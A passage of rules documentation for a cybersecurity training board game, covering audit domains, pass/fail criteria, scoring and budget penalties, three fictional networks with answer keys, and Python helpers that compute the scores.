║ → AUDIT: "Control gap remediation" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ FIND-03: PERSISTENCE MECHANISMS DISCOVERED ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Multiple persistence artifacts found ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Primary Persistence: [Scheduled task, registry run, etc] ║
║ Backup Persistence: [Redundant persistence methods] ║
║ Dormancy: [How long could malware remain active undetected] ║
║ ║
║ THREAT: ║
║ Attacker likely still has access (persistence remains active) ║
║ - Malware calls home regularly (C2 connections) ║
║ - Can re-establish access if initial access closed ║
║ - May deploy additional payloads over time ║
║ ║
║ IMMEDIATE ACTIONS: ║
║ 1. Fully remediate all discovered persistence mechanisms ║
║ 2. Search for backup persistence (often multiple methods) ║
║ 3. Monitor for re-establishment of access ║
║ 4. Assume attacker may have staged additional backdoors ║
║ ║
║ FEEDS INTO MODULES: ║
║ → HARDENING: "Persistence prevention and detection" ║
║ → DISASTER RECOVERY: "Scope of remediation (how deep?)" ║
║ → AUDIT: "Endpoint protection review" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ FIND-04: INVESTIGATIVE GAPS & RECOMMENDATIONS ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Investigation completes (Victory or Failure) ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Key Questions Answered: ║
║ - [ ] Attack entry point identified? ║
║ - [ ] Attacker motivation understood? ║
║ - [ ] Threat actor identified (attribution)? ║
║ - [ ] Data compromised: volume and sensitivity? ║
║ - [ ] Current access status: eliminated or ongoing? ║
║ - [ ] Persistence mechanisms: removed or active? ║
║ ║
║ Remaining Questions: ║
║ - [List specific unknowns from the investigation] ║
║ - [What evidence gaps prevent complete understanding] ║
║ - [What would close these gaps (more investigation, experts)] ║
║ ║
║ NEXT STEPS: ║
║ 1. [If gaps remain: External forensics firm for deep analysis] ║
║ 2. [Law enforcement involvement for attribution/prosecution] ║
║ 3. [Threat intelligence: share findings with industry] ║
║ 4. [Lessons learned: update hardening/network architecture] ║
║ ║
║ FEEDS INTO MODULES: ║
║ → AUDIT & COMPLIANCE: "Post-incident review and control updates"║
║ → TRAINING: "Lessons learned session with all teams" ║
║ → STRATEGIC: "Investment in detection/response capabilities" ║
╚════════════════════════════════════════════════════════════════╝
Result: Quick understanding of attack progression without full attribution
Result: Complete attack narrative with attribution
Result: Expert-level forensic analysis, actionable threat intelligence
Q: Can I discover the same Evidence card twice? A: No. Each Evidence card represents a unique finding. Multiple investigations may point to the same finding (confirming it), but you only gain progress once.
Q: What if I fail an investigation? A: No Evidence is discovered, but you've used a turn and Budget. You can retry next turn (costs full Budget again) or move to a different investigation.
Q: How do I use Evidence Cards to support my narrative? A: Reference specific Evidence cards when describing findings to Threat Orchestrator or in debrief. Chain of Custody rating shows admissibility in court.
docs/rules/module-audit-compliance.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
v2.2: this document's modifier table is canonical — the tables in
cards/audit-compliance/ are generated from it. See v2.2 Playtest Edition Changes at the bottom.
The Audit & Compliance Module teaches players how security assessments reveal vulnerabilities that attackers will eventually exploit. Teams conduct a simulated third-party audit of their IT infrastructure, discovering gaps that will matter later.
Key Concept: "Auditors find what attackers will exploit." The findings from this module either inform hardening decisions (if successful) or create additional costs (if incident occurs).
Module Teaches:
- Primary: Security assessment, compliance frameworks (NIST, CIS, PCI-DSS), vulnerability discovery
- Secondary: Risk prioritization, remediation planning, audit-to-action translation

Integration Point:
- Can be played standalone (teams audit a pre-built network)
- OR as setup for Incident Response/Disaster Recovery (audit findings modify those modules)
- See module-combinations.md for recommended sequences
| Framework | Focus | Best For |
|---|---|---|
| NIST Cybersecurity Framework | 5 Core Functions | General organizations |
| CIS Critical Controls | 18 Controls (CIS v8) | Defense-focused |
| PCI-DSS | Payment card security | Retail/e-commerce |
| HIPAA | Healthcare data | Healthcare organizations |
| Multi-Framework | Mix of above | Realistic compliance |
Key Point: Framework choice determines which audit domains are tested.
Budget note (v2.2): core-rules gives the Audit module a starting Budget of 100. That Budget applies only when playing the optional Remediation follow-up cards (see cards/audit-compliance/expansion-deck/compliance-frameworks.md, remediation section); the assessment itself costs nothing.
| Scope | Time | Networks Evaluated |
|---|---|---|
| Basic | 5 min | One pre-built network |
| Standard | 10 min | One network from Network Building OR pre-built |
| Comprehensive | 15+ min | Multiple networks / multiple locations |
Option A: Use Pre-Built Network
- Threat Orchestrator provides a sample network
- Teams audit it without having built it
- Focuses on audit skills, not network design

Option B: Use Network from Network Building Module
- Teams audit the network they just built
- Directly see consequences of earlier decisions
- More integrated experience

Option C: Create Fictional Network via Narrative
- Threat Orchestrator describes a scenario: "Your organization has email, web, database, and domain controller servers. Some are on-prem, some in cloud. You have a firewall but no IDS."
- Teams audit based on the description
- Faster, requires less setup
Threat Orchestrator (Acting as External Auditor) reviews the network and assesses 6 audit domains:
Audit Question: "Does your network properly isolate critical systems from untrusted networks?"
Pass Criteria (all required):
- Segmented architecture implemented (3+ zones)
- Firewall deployed between zones
- Critical systems (Database, Domain Controller) in a separate zone from internet-facing systems

Fail Criteria (any one):
- Flat network (no segmentation)
- Segmentation without a firewall
- Critical systems in the same zone as untrusted systems

If FAIL - Finding:
- Name: Network Segmentation Gap
- Risk Level: CRITICAL
- Consequence in IR: Lateral movement easier (-1 to defending against NETWORK attacks)
- Consequence in DR: Attacker access spreads to more systems (-10 DR budget penalty)
Narrative for Teams: "All of your systems are on the same network segment. Once an attacker gains access to one system, they can move freely between others."
Audit Question: "Is your identity system (directory services, authentication, authorization) properly secured?"
Pass Criteria (all required):
- Domain Controller deployed
- Domain Controller on a separate network segment
- Domain Controller not overloaded (≤2 services)

Fail Criteria (any one):
- No Domain Controller deployed
- Domain Controller on the same segment as untrusted systems
- Domain Controller overloaded (3+ services)

If FAIL - Finding:
- Name: Identity System Vulnerability
- Risk Level: CRITICAL
- Consequence in IR: Credential-based attacks easier (-1 to defending against CREDENTIAL_ABUSE attacks)
- Consequence in DR: Full credential compromise; all user accounts compromised (-15 DR budget penalty)
Narrative for Teams: "Your identity system is overloaded with too many services and insufficient hardening. If compromised, attackers will have broad access to all user credentials."
Audit Question: "Can you detect attacks when they happen? Do you have monitoring and alerting?"
Pass Criteria (any one of the following):
- IDS or IPS deployed
- SIEM system deployed
- Email Gateway + Honeypot deployed (detection alternatives)

Fail Criteria (any one):
- None of the above detection systems deployed
- Only basic security devices with no central logging

If FAIL - Finding:
- Name: Detection & Monitoring Gap
- Risk Level: HIGH
- Consequence in IR: Investigations slower (-1 to Investigation rolls; 12+ instead of 11+)
- Consequence in DR: Breach undetected longer; more data stolen (-10 DR budget penalty)
Narrative for Teams: "You have no centralized logging or monitoring. When an attack happens, you won't know about it until data is already compromised."
Audit Question: "Do you have functional backups? Can you recover from data loss or ransomware?"
Pass Criteria:
- Backup System deployed, AND at least one of:
  - Backup isolated on a separate network
  - Cloud backup configured
  - Multiple hosting locations (on-prem + cloud redundancy)

Fail Criteria (any one):
- No Backup System deployed
- Single point of failure (all on-prem or all cloud)

If FAIL - Finding:
- Name: Backup & Recovery Gap
- Risk Level: CRITICAL (for ransomware/DR only)
- Consequence in IR: None (a recovery gap, not a detection or defense issue)
- Consequence in DR: Ransomware unrecoverable; full rebuild required (-25 DR budget penalty)
Narrative for Teams: "You have no backup strategy. If ransomware hits, you cannot recover your data. You must either pay ransom or rebuild from scratch."
Audit Question: "Are your cloud systems and third-party integrations properly secured and isolated?"
Pass Criteria (all required):
- Cloud systems isolated on a private network (VPN)
- Cloud systems monitored/managed
- Credentials for cloud access securely managed

Fail Criteria (any one):
- Cloud systems internet-exposed
- No monitoring of cloud services
- Credentials for cloud access stored locally

If FAIL - Finding:
- Name: Cloud Security Gap
- Risk Level: HIGH
- Consequence in IR: Cloud-based attacks easier (-1 to defending against WEB_EXPLOIT attacks)
- Consequence in DR: Cloud compromise requires cloud provider recovery; slow remediation (-20 DR budget penalty)
Narrative for Teams: "Your cloud systems are internet-accessible without protection. Any attacker can directly target your cloud infrastructure."
Audit Question: "Do you have centralized logging, monitoring, and security operations capability?"
Pass Criteria (any one):
- SIEM system deployed
- Email Gateway + IDS deployed (combined monitoring)

Fail Criteria:
- No SIEM or equivalent centralized logging

If FAIL - Finding:
- Name: Security Operations Gap
- Risk Level: MEDIUM
- Consequence in IR: Investigations slower (-1 to Investigation rolls)
- Consequence in DR: Forensic analysis slow; can't determine breach scope (-5 DR budget penalty)
Narrative for Teams: "You have no centralized place to view security events. When an attack happens, investigators must pull data from multiple sources manually."
After all 6 domains are assessed, Threat Orchestrator produces an Audit Findings Report:
SECURITY AUDIT FINDINGS REPORT
Organization: [Name]
Assessment Date: [Date]
Framework: [Framework used]
Auditor: [Your name / External firm]
═══════════════════════════════════════════
DOMAIN ASSESSMENT SUMMARY:
✓ PASS - Network Segmentation & Isolation
Observation: Network properly segmented with firewalls between zones.
Assessment: Risk is LOW for lateral movement.
✗ FAIL - Access Control & Identity Management
Finding: Domain Controller overloaded with excessive services.
Risk: If DC compromised, entire identity system at risk.
Severity: CRITICAL
Recommendation: Isolate DC to minimal required services.
✓ PASS - Threat Detection & Incident Response
Observation: SIEM system deployed with centralized logging.
Assessment: Good detection capability.
✗ FAIL - Backup & Disaster Recovery
Finding: No backup system deployed.
Risk: Data loss unrecoverable; ransomware response limited to ransom/rebuild.
Severity: CRITICAL
Recommendation: Deploy backup system immediately.
✓ PASS - Third-Party Risk & Cloud Security
Observation: Cloud systems properly isolated on private network.
Assessment: Cloud security posture adequate.
✗ FAIL - Security Operations & Monitoring
Finding: No centralized logging platform.
Risk: Incident investigation will be slow and manual.
Severity: HIGH
Recommendation: Deploy SIEM or equivalent centralized logging.
═══════════════════════════════════════════
FINAL SCORE: 3/6 DOMAINS PASS
Overall Assessment: CONCERNING GAPS IDENTIFIED
Summary: Organization has adequate network and cloud security but lacks:
1. Proper identity system isolation
2. Backup/recovery capability
3. Centralized monitoring
Impact Estimate:
- If attack occurs: Detection delayed, recovery impossible without ransom
- Estimated cost to remediate findings: ~$40K (modest investment)
- Estimated cost of breach due to these gaps: ~$500K+ (significant exposure)
Recommendation Priority:
1. Deploy backup system (prevent ransomware catastrophe)
2. Isolate Domain Controller (prevent credential compromise)
3. Centralize logging (speed up incident response)
PASS/FAIL per domain (X/6) is the primary score. Star ratings (1-5★) are flavor for narrative reports, with this fixed mapping:
1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL
Optional (v2.2): a 5★ (exemplary) rating in Detection grants +1 to Incident Response investigation rolls if IR is played later.
Teams receive a score reflecting their infrastructure quality:
| Score | Assessment | Interpretation |
|---|---|---|
| 6/6 PASS | Enterprise-Grade | No modifiers carried into later modules; strong foundation |
| 5/6 PASS | Strong Security | -1 modifier to one attack type in IR |
| 4/6 PASS | Adequate Security | -1 modifier to two attack types in IR |
| 3/6 PASS | Concerning Gaps | -1 modifier to three attack types; IR noticeably harder for defenders |
| Below 3/6 | High Risk | Multiple -1 modifiers; IR much easier; DR much costlier |
6/6 Pass: "Your organization demonstrates strong security practices across all domains. While no system is perfect, you have implemented key controls and best practices."
4-5/6 Pass: "Your organization has good foundational security but should prioritize remediation of identified gaps. Most critical systems are protected, but some exposure remains."
3/6 Pass: "Your organization has significant security gaps that create real risk. Multiple critical domains require attention. If an incident occurs, you will face challenges."
Below 3/6: "Your organization has critical gaps across multiple domains. Significant investment needed to meet baseline security standards."
When audit findings exist and other modules are played:
Each FAIL finding creates a -1 modifier (one per gap — canonical, v2.2) to the relevant roll:
| Audit Finding | IR Modifier | Affected Threat Type |
|---|---|---|
| Segmentation Gap | -1 to NETWORK defenses | Lateral movement attacks easier |
| Identity Gap | -1 to CREDENTIAL_ABUSE defenses | Credential attacks easier |
| Detection Gap | -1 to Investigation rolls | Finding threats takes longer (11+ becomes 12+) |
| Backup Gap | No IR effect | (Matters in Disaster Recovery) |
| Cloud Gap | -1 to WEB_EXPLOIT defenses | Web/API attacks easier |
| Operations Gap | -1 to Investigation rolls | Forensic investigation slower |
Example: Segmentation Gap Active in IR
INCIDENT RESPONSE PHASE:
Team's Threat: Lateral Movement via SMB
Base roll needed: 11+
Audit Modifier: -1 (Segmentation Gap)
Effective roll needed: 12+
Team's Defense: Network Segmentation (newly deployed)
Roll: 14 + 2 (justification) = 16
Result: SUCCESS (16 ≥ 12)
TO Narrative: "Your network segmentation worked perfectly, stopping the
lateral movement that would have been trivial in an unsegmented network."
Each FAIL finding is a penalty subtracted from the DR starting budget (this table is canonical — v2.2):
| Audit Finding | DR Budget Penalty |
|---|---|
| Segmentation Gap | -10 Budget (attacker spreads to more systems) |
| Identity Gap | -15 Budget (full credential compromise) |
| Detection Gap | -10 Budget (dwell time longer; more data stolen) |
| Backup Gap | -25 Budget (no recovery option; expensive rebuild) |
| Cloud Gap | -20 Budget (cloud provider recovery needed) |
| Operations Gap | -5 Budget (forensic investigation slow) |
Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.
Example: Multiple Gaps in DR (v2.2)
DISASTER RECOVERY PHASE:
Teams start with 50 crisis budget (DR 50; for reference, IR starts at 100).
Audit Failures from earlier assessment:
- Segmentation Gap: -10
- Detection Gap: -10
- Backup Gap: -25
Raw Gap Penalty: -45 -> capped at -30
Available Crisis Budget: 50 - 30 = 20
With 20 Budget the team can still afford the mandatory beats
(cheapest mandatory path is 29 -> they must lean on the free
Holding Statement and skip actions), but the response will be
thin. Outcome: heavy pressure, likely reputation damage.
Recommended Flow: Audit → Incident Response
Identify 3-5 gaps in network
Generate Modifiers (2 minutes)
Each gap becomes a -1 modifier to relevant defense in IR
Play Incident Response (35-40 minutes)
Teams gain appreciation for audit value
Debrief (10 minutes)
Recommended Flow: Audit → [Incident Response] → Disaster Recovery
Identify gaps (particularly Backup Gap and Detection Gap)
Skip or Lose IR (optional)
Assume attackers breached and incident was NOT detected
Play Disaster Recovery (30-35 minutes)
Teams discover detection gap = dwell time was 48+ hours
Debrief (10 minutes)
Play Just the Audit Module (as independent learning)
Network Characteristics:
- Flat network (no segmentation)
- Email, web, database on same servers (overloaded)
- No backup system
- No SIEM or monitoring
- All on-premises
Expected Audit Result:
- 1-2/6 domains pass
- Multiple CRITICAL findings
- High remediation cost
- Team learns value of basics (backup, monitoring)
Network Characteristics:
- Segmented network with firewall
- Dedicated servers for critical functions
- Backup system present
- IDS deployed but no SIEM
- Hybrid on-prem/cloud
Expected Audit Result:
- 4/6 domains pass
- 2 MEDIUM findings (monitoring, cloud config)
- Moderate remediation cost
- Team learns importance of comprehensive monitoring
Network Characteristics:
- Fully isolated network architecture
- Dedicated hardened servers
- Comprehensive backup strategy
- SIEM + IDS deployed
- Cloud properly secured
Expected Audit Result:
- 5-6/6 domains pass
- 0-1 minor findings
- Low remediation cost
- Team learns value of comprehensive program
Focus audit on specific compliance requirement:
- PCI-DSS: Focus on payment card handling, encryption, access control
- HIPAA: Focus on healthcare data protection, audit logs, access management
- SOC 2: Focus on security, availability, confidentiality controls
- GDPR: Focus on data protection, breach notification, privacy
Each framework has different pass/fail criteria.
Run audit multiple times with team improvements:
1. Initial audit (baseline)
2. Team makes improvements based on findings
3. Follow-up audit (measure improvement)
4. Calculate improvement % and cost-benefit
Instead of a compliance framework, audit against a specific threat profile:
- "This organization faces nation-state threat" → Audit for advanced detection
- "This organization handles PHI data" → Audit for healthcare security
- "This organization processes credit cards" → Audit for PCI-DSS
- "This organization is critical infrastructure" → Audit for resilience
| Domain | PASS Meaning | FAIL Consequence (IR) | FAIL Consequence (DR) |
|---|---|---|---|
| Segmentation | Good isolation | -1 to NETWORK defense | -10 budget |
| Identity | Proper AC | -1 to CREDENTIAL_ABUSE defense | -15 budget |
| Detection | Good monitoring | -1 to Investigation | -10 budget |
| Backup | Recovery capable | None | -25 budget |
| Cloud | Secure cloud | -1 to WEB_EXPLOIT defense | -20 budget |
| Operations | Good logging | -1 to Investigation | -5 budget |
Cap (v2.2): total DR budget penalty capped at -30. Star flavor mapping: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL.
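The carry-over rules above as a small calculator, added here as an example rather than the game's own code. Function names are this example's own, as is the assumption that two Investigation penalties (Detection Gap plus Operations Gap) stack to -2 on the same roll:

```python
"""Audit carry-over calculator (added example; not Incident Zero's own code).

Takes per-domain audit results and applies the canonical v2.2 rules: stars map
to PASS/FAIL (1-2 = FAIL, 3+ = PASS, PARTIAL = FAIL), every FAIL is one -1
modifier in IR, and DR budget penalties are summed and capped at -30.
"""
from __future__ import annotations

# Canonical carry-over per FAIL finding: (IR roll affected, DR budget penalty).
CARRYOVER = {
    "Segmentation": ("NETWORK defenses", 10),
    "Identity": ("CREDENTIAL_ABUSE defenses", 15),
    "Detection": ("Investigation rolls", 10),
    "Backup": (None, 25),          # no IR effect; matters in Disaster Recovery
    "Cloud": ("WEB_EXPLOIT defenses", 20),
    "Operations": ("Investigation rolls", 5),
}
DR_PENALTY_CAP = 30     # v2.2: total gap penalty into a later module is capped at -30
DR_START_BUDGET = 50
BASE_TARGET = 11        # roll + modifiers >= 11 succeeds


def is_pass(result: str | int) -> bool:
    """Normalise a domain result: 'PASS'/'FAIL'/'PARTIAL' or a 1-5 star count."""
    if isinstance(result, int):
        if not 1 <= result <= 5:
            raise ValueError(f"star rating out of range: {result}")
        return result >= 3                 # 1-2 stars = FAIL, 3+ = PASS
    return result.upper() == "PASS"        # PARTIAL (and anything else) counts as FAIL


def assessment(passes: int) -> str:
    """Tier from the X/6 scoring table."""
    tiers = {6: "Enterprise-Grade", 5: "Strong Security",
             4: "Adequate Security", 3: "Concerning Gaps"}
    return tiers.get(passes, "High Risk")


def carry_over(results: dict[str, str | int]) -> dict:
    """Compute score tier, IR modifiers and the DR budget for a completed audit."""
    unknown = set(results) - set(CARRYOVER)
    if unknown:
        raise ValueError(f"unknown domains: {sorted(unknown)}")
    # A domain left off the worksheet is treated as FAIL (assumption of this example).
    fails = [d for d in CARRYOVER if not is_pass(results.get(d, "FAIL"))]
    ir_mods: dict[str, int] = {}
    for domain in fails:
        target, _ = CARRYOVER[domain]
        if target is not None:
            # One -1 per gap; assumed to stack when two gaps hit the same roll.
            ir_mods[target] = ir_mods.get(target, 0) - 1
    raw_penalty = sum(CARRYOVER[d][1] for d in fails)
    penalty = min(raw_penalty, DR_PENALTY_CAP)
    return {
        "passes": 6 - len(fails),
        "assessment": assessment(6 - len(fails)),
        "fails": fails,
        "ir_modifiers": ir_mods,
        # A -1 to Investigation rolls turns the 11+ target into 12+.
        "investigation_target": BASE_TARGET - ir_mods.get("Investigation rolls", 0),
        "dr_penalty_raw": raw_penalty,
        "dr_penalty": penalty,
        "dr_budget": DR_START_BUDGET - penalty,
    }


if __name__ == "__main__":
    # The "Multiple Gaps in DR" example from the rules: Segmentation, Detection, Backup fail.
    example = {"Segmentation": "FAIL", "Identity": 4, "Detection": "PARTIAL",
               "Backup": 2, "Cloud": "PASS", "Operations": 3}
    for key, value in carry_over(example).items():
        print(f"{key:22} {value}")
```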
cards/audit-compliance/core-deck/audit-domain-cards.md and cards/audit-compliance/README.md are regenerated from it. One-off mechanics that existed nowhere else ("+5 turn penalty", "+1 escalation point", "-2 modifier", "+1 difficulty") are deleted or folded into the canonical -1-per-gap rule.
Audit & Compliance Module - Rules & Mechanics
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition
docs/standalone-games/audit-compliance.md
Version: 2.2 - Playtest Edition — answer keys now follow the printed criteria; PASS/FAIL (X/6) is the primary score (stars: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL). See docs/rules/module-audit-compliance.md for the canonical modifier table.
Compliance Audit Standalone offers three distinct game modes that can be played independently:
Common Theme: Teams understand how audits find vulnerabilities that attackers will exploit.
Best For:
- Standalone 20-35 minute sessions
- Teaching audit frameworks
- Understanding security gaps
- Before/after comparison with the Incident Response module
- Competitive assessment skills
Duration: 15-25 minutes
Players: 1-4 teams
Difficulty: Easy (low cognitive load)
Best For: Quick session, first-time audit introduction
"Three organizations have submitted their infrastructure for audit. Review each one and score their security posture. Which has the best design? Which is most vulnerable?"
Teams receive 3 pre-built network descriptions and audit them against a 6-domain framework. Compare results and discuss why vulnerabilities matter.
INFRASTRUCTURE DESCRIPTION:
Startup Tech is a 50-person web development company.
Cloud-first approach, minimal on-premises systems.
DEPLOYMENT:
- Web Server (Cloud - AWS): Hosts company website and app portal
- Database Server (Cloud - AWS RDS): Customer data, 100K records
- Development Server (Cloud - AWS EC2): Dev/test environment
- Domain Controller (On-Prem): AD for user identity (1 small server)
- File Server (On-Prem): Shared documents
- Email Server (Cloud - Microsoft 365): Email via SaaS provider
SECURITY DEVICES:
- Email Gateway: None (using Microsoft 365 default)
- Firewall: AWS Security Groups (cloud provider native)
- IDS/IPS: None
- SIEM: None
- WAF: None
- Backup: AWS automated snapshots + Microsoft 365 retention
- VPN: None (all cloud-native, no remote access needed)
NETWORK ARCHITECTURE:
- Hybrid (50% Cloud, 50% On-Prem)
- Cloud systems accessible via internet (all public IP)
- On-prem systems on isolated LAN
- No network segmentation between cloud and on-prem
HOSTING:
- 50% AWS (web, database, dev)
- 50% On-Premises (AD, file sharing)
SECURITY POSTURE:
- No perimeter firewall monitoring
- Cloud infrastructure: AWS default security (basic)
- On-prem infrastructure: Minimal controls
- Identity: Single AD instance (critical point)
- No incident detection
- Backups functional but not tested
INFRASTRUCTURE DESCRIPTION:
Mid-Market Corp is a 200-person financial services company.
Balanced on-premises and cloud, mature IT operations.
DEPLOYMENT:
- Email Server (On-Prem): Exchange 2019
- Web Server (Cloud - Azure): Public website + customer portal
- Database Server (On-Prem): SQL Server, customer data, 1M records
- File Server (On-Prem): Network file shares, active collaboration
- Domain Controller (On-Prem): AD + LDAP, 200 users
- Development Server (Cloud - Azure): Dev/test
- Backup System (On-Prem): Backup appliance, off-site replication
- Legacy System (On-Prem): 15-year-old accounting system
SECURITY DEVICES:
- Firewall: Cisco ASA (perimeter) + internal segmentation firewall
- Email Gateway: Proofpoint (phishing/malware filter)
- IDS: Suricata (network-based detection)
- IPS: None (IDS only)
- SIEM: Splunk (centralized logging)
- WAF: AWS WAF (in front of web server)
- VPN: Cisco AnyConnect (remote access)
- Honeypot: None
NETWORK ARCHITECTURE:
- Segmented (3 zones: DMZ, Internal, Finance)
- Firewalls enforce zone boundaries
- On-prem systems segregated from cloud
- Cloud systems on private network (not public internet)
HOSTING:
- 40% On-Premises (core business systems)
- 60% Cloud (web, dev, supplementary)
SECURITY POSTURE:
- Perimeter monitoring active (IDS)
- Email filtering active
- Centralized logging (SIEM)
- Remote access controlled (VPN)
- Backup and recovery tested
- Legacy system isolated but unpatched
INFRASTRUCTURE DESCRIPTION:
Enterprise Bank is a 1000+ person financial institution.
Highly regulated (PCI-DSS, HIPAA), on-premises focused.
DEPLOYMENT:
- Email Server (On-Prem): Custom hardened system + redundancy
- Web Server (Cloud/Hybrid): DMZ layer for customer portal
- Database Server (On-Prem): Oracle RAC, 500M+ records, air-gapped
- File Server (On-Prem): Multiple redundant file servers by department
- Domain Controller (On-Prem): Multiple DCs, LDAP + Kerberos, hardened
- Development Server (On-Prem): Isolated dev network, no access to prod
- Backup System (On-Prem): Multiple backup systems, offline vault, geographically distant
- Cloud Workload (Limited): Only non-sensitive workloads
SECURITY DEVICES:
- Firewall: Multiple Palo Alto Networks firewalls (perimeter + internal + cloud boundary)
- Email Gateway: Proofpoint + internal inspection
- IDS: Multiple IDS systems (network + host-based)
- IPS: Palo Alto IPS (active blocking)
- SIEM: Splunk + IBM QRadar (redundant)
- WAF: F5 WAF (multi-layer)
- VPN: Multiple VPN concentrators, MFA required
- Honeypot: Internal honeypot network (3 decoy systems)
- Network Segmentation: Microsegmentation between critical systems
- Intrusion Prevention: Advanced threat prevention
NETWORK ARCHITECTURE:
- Fully Isolated (10+ security zones)
- Each zone has firewall enforcement
- Zero-trust network access
- Air-gapped critical systems
- Private clouds only (no public internet access)
HOSTING:
- 95% On-Premises (regulatory requirement)
- 5% Cloud (non-critical, isolated)
SECURITY POSTURE:
- Comprehensive logging (multiple SIEM)
- Advanced threat detection (IDS/IPS + honeypot)
- Incident response ready
- Backup and recovery tested quarterly
- All systems hardened per NIST guidelines
- Compliance audited annually (PCI-DSS, SOX)
Teams assess each network using this framework. Scoring (v2.2): PASS/FAIL per domain (X/6) is the primary score. If you use star ratings for flavor, the fixed mapping is 1-2★ = FAIL, 3★+ = PASS, "PARTIAL" counts as FAIL.
Question: "Are critical systems isolated?"
| Score | Criteria |
|---|---|
| PASS | Firewall between zones OR microsegmentation active |
| FAIL | Flat network OR segmentation without enforcement |
Question: "Is identity management secure?"
| Score | Criteria |
|---|---|
| PASS | Dedicated Domain Controller, MFA for remote access, minimal over-privilege |
| FAIL | No DC OR DC overloaded OR no MFA OR broad admin access |
Question: "Can you detect attacks?"
| Score | Criteria |
|---|---|
| PASS | IDS/IPS or SIEM deployed, covering all critical segments |
| FAIL | No IDS/IPS and no SIEM, OR a critical segment sits outside detection coverage |
Question: "Can you recover from failure?"
| Score | Criteria |
|---|---|
| PASS | Backup system deployed + tested + geographically diverse |
| FAIL | No backup OR untested backup OR single location |
Question: "Are cloud/vendor systems managed?"
| Score | Criteria |
|---|---|
| PASS | Cloud systems isolated OR not handling critical data |
| FAIL | Cloud systems on internet + handling sensitive data + no WAF |
Question: "Do you have centralized visibility?"
| Score | Criteria |
|---|---|
| PASS | SIEM deployed + centralized logging active |
| FAIL | No SIEM OR no centralized logging |
AUDIT WORKSHEET
Organization audited: ______________________ Auditing team: ______________________
Domain PASS/FAIL Key finding (one line)
1. Network Segmentation [ ] ______________________________________
2. Access Control & Identity [ ] ______________________________________
3. Incident Detection & Response [ ] ______________________________________
4. Backup & Disaster Recovery [ ] ______________________________________
5. Third-Party Risk Management [ ] ______________________________________
6. Security Ops & Monitoring [ ] ______________________________________
SCORE: ____ / 6 PASS (PARTIAL counts as FAIL; stars: 1-2* = FAIL, 3*+ = PASS)
TOP 3 RECOMMENDATIONS:
1. ___________________________________________________________________________
2. ___________________________________________________________________________
3. ___________________________________________________________________________
TO explains: "You're security auditors reviewing three organizations' infrastructure designs. For each, you'll score them on a 6-domain framework. Your goal: Identify which has the strongest security posture and which is most vulnerable."
For each network (Startup, Mid-Market, Enterprise):
Teams answer:
1. "Which organization is most secure?"
2. "Which is most vulnerable to attack?"
3. "If you HAD to use one network, which would you choose?"
| Domain | Score | Finding |
|---|---|---|
| Network Segmentation | FAIL | No firewall between cloud and on-prem; cloud accessible from internet |
| Access Control | FAIL | Dedicated AD exists, but no MFA anywhere (cloud consoles are remote access) — "no MFA" is a FAIL condition |
| Detection | FAIL | No IDS/IPS or SIEM |
| Backup & Recovery | FAIL | AWS snapshots + M365 retention exist but are untested — "untested backup" is a FAIL condition |
| Third-Party Risk | FAIL | Cloud systems public internet-accessible, holding customer data, no WAF |
| Operations | FAIL | No centralized monitoring |
Score: 0/6 PASS (strict). A lenient auditor might award Access Control a narrow PASS — dedicated, single-purpose DC and no VPN/remote-access paths to on-prem — for 1/6. Either reading lands in the same tier: Below 3/6, HIGH RISK. (The judgment call itself is a great Variation C debate.)
Risk Rating: HIGH / CRITICAL
- Vulnerabilities: No network segmentation, no detection capability, no MFA, untested backups, cloud systems exposed
- Attack Scenario: Attacker compromises cloud web server → lateral movement to on-prem AD → full network access; if ransomware hits, the untested backups may not restore
- Cost of Breach: Very high (no detection, no segmentation to contain, recovery uncertain)
| Domain | Score | Finding |
|---|---|---|
| Network Segmentation | PASS | Firewalls between DMZ, Internal, Finance zones |
| Access Control | PASS | AD hardened, VPN with MFA |
| Detection | FAIL | IDS + SIEM deployed, but detection-only (no IPS blocking) and the isolated legacy accounting segment sits outside IDS coverage — a blind spot at the highest-risk, unpatched system |
| Backup & Recovery | PASS | Backup appliance with off-site replication, tested |
| Third-Party Risk | PASS | Cloud systems on private network, WAF in place |
| Operations | PASS | SIEM + centralized logging |
Score: 5/6 PASS
Risk Rating: MEDIUM
- Strengths: Good segmentation, logging, backups
- Weaknesses: Legacy accounting system (unpatched, and unmonitored — the Detection FAIL)
- Attack Scenario: Attacker may get into DMZ but segmentation blocks lateral movement; an attack routed through the legacy segment, however, could go undetected
- Cost of Breach: Moderate (segmentation limits damage; the legacy blind spot is the residual risk)
| Domain | Score | Finding |
|---|---|---|
| Network Segmentation | PASS | Microsegmentation between all critical systems |
| Access Control | PASS | Hardened DCs, MFA, minimal over-privilege |
| Detection | PASS | IDS/IPS + dual SIEM + honeypot |
| Backup & Recovery | PASS | Multiple offline vaults, quarterly testing |
| Third-Party Risk | PASS | Cloud only for non-critical, extensive monitoring |
| Operations | PASS | Dual SIEM, air-gapped logging |
Score: 6/6 PASS
Risk Rating: LOW
- Strengths: Defense-in-depth across all domains
- Weaknesses: Very expensive to operate; regulatory complexity
- Attack Scenario: Multiple layers would have to be bypassed; honeypot would alert SOC immediately
- Cost of Breach: Lower (but incident response costs are high due to complexity)
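The 6-domain framework and the three answer keys above as an executable auditor, added as an example and not part of the Incident Zero project: each PASS line of the criteria tables becomes a predicate over a network profile, and the three profiles are constructed here from the infrastructure descriptions (field names are this example's own choices). It reproduces the strict reading of the answer keys: Startup 0/6, Mid-Market 5/6, Enterprise 6/6.

```python
"""Audit framework evaluator for the Variation A sample networks (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class NetworkProfile:
    """Facts an auditor extracts from an infrastructure description."""
    name: str
    firewall_between_zones: bool            # Domain 1: Network Segmentation
    microsegmentation: bool
    dedicated_dc: bool                      # Domain 2: Access Control & Identity
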